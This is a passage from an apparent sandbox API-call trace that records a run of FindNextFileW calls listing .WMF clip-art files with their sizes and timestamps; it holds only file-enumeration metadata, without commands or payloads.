ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28b4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00913_.WMF", cAlternateFileName="")) returned 1 [0175.187] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b0c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00914_.WMF", cAlternateFileName="")) returned 1 [0175.187] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1bf8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00915_.WMF", cAlternateFileName="")) returned 1 [0175.187] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1270, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00916_.WMF", cAlternateFileName="")) returned 1 [0175.187] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25ac, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00917_.WMF", cAlternateFileName="")) returned 1 [0175.188] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f5c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00918_.WMF", cAlternateFileName="")) returned 1 [0175.188] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2944, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00935_.WMF", cAlternateFileName="")) returned 1 [0175.188] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1960, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00938_.WMF", cAlternateFileName="")) returned 1 [0175.188] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1708, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00941_.WMF", cAlternateFileName="")) returned 1 [0175.188] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1264, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00942_.WMF", cAlternateFileName="")) returned 1 [0175.188] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d84, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00943_.WMF", cAlternateFileName="")) returned 1 [0175.188] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xae1a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO01044_.WMF", cAlternateFileName="")) returned 1 [0175.188] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5b38, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO01063_.WMF", cAlternateFileName="")) returned 1 [0175.189] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1075e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO01236_.WMF", cAlternateFileName="")) returned 1 [0175.189] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x43b0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO01560_.WMF", cAlternateFileName="")) returned 1 [0175.189] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x59d8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO01561_.WMF", cAlternateFileName="")) returned 1 [0175.189] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x75ca, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO01563_.WMF", cAlternateFileName="")) returned 1 [0175.189] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x51a8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO01566_.WMF", cAlternateFileName="")) returned 1 [0175.189] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x54b0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO01568_.WMF", cAlternateFileName="")) returned 1 [0175.189] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x47a0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO01569_.WMF", cAlternateFileName="")) returned 1 [0175.189] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa8a6, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO01575_.WMF", cAlternateFileName="")) returned 1 [0175.189] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2566, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO01777_.WMF", cAlternateFileName="")) returned 1 [0175.190] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6ca8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO01785_.WMF", cAlternateFileName="")) returned 1 [0175.190] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1088, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO01805_.WMF", cAlternateFileName="")) returned 1 [0175.190] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x578, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO01905_.WMF", cAlternateFileName="")) returned 1 [0175.190] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3086, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO01954_.WMF", cAlternateFileName="")) returned 1 [0175.190] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d14, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02009_.WMF", cAlternateFileName="")) returned 1 [0175.190] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d68, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02022_.WMF", cAlternateFileName="")) returned 1 [0175.190] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x23a8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02024_.WMF", cAlternateFileName="")) returned 1 [0175.190] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2016, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02025_.WMF", cAlternateFileName="")) returned 1 [0175.191] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x24c8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02028_.WMF", cAlternateFileName="")) returned 1 [0175.191] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x266c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02045_.WMF", cAlternateFileName="")) returned 1 [0175.191] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fde, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02048_.WMF", cAlternateFileName="")) returned 1 [0175.191] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c2c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02051_.WMF", cAlternateFileName="")) returned 1 [0175.191] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30ca, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02054_.WMF", cAlternateFileName="")) returned 1 [0175.191] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c4c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02055_.WMF", cAlternateFileName="")) returned 1 [0175.191] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x382a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02067_.WMF", cAlternateFileName="")) returned 1 [0175.191] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b4a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02094_.WMF", cAlternateFileName="")) returned 1 [0175.192] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x540, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02227_.WMF", cAlternateFileName="")) returned 1 [0175.192] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x334, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02228_.WMF", cAlternateFileName="")) returned 1 [0175.192] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x900, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02233_.WMF", cAlternateFileName="")) returned 1 [0175.192] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe88, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02252_.WMF", cAlternateFileName="")) returned 1 [0175.192] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8e0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02253_.WMF", cAlternateFileName="")) returned 1 [0175.192] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x818, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02261_.WMF", cAlternateFileName="")) returned 1 [0175.192] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa94, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02263_.WMF", cAlternateFileName="")) returned 1 [0175.192] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x38c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02265_.WMF", cAlternateFileName="")) returned 1 [0175.193] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x61c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02268_.WMF", cAlternateFileName="")) returned 1 [0175.193] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaf0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02269_.WMF", cAlternateFileName="")) returned 1 [0175.193] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, 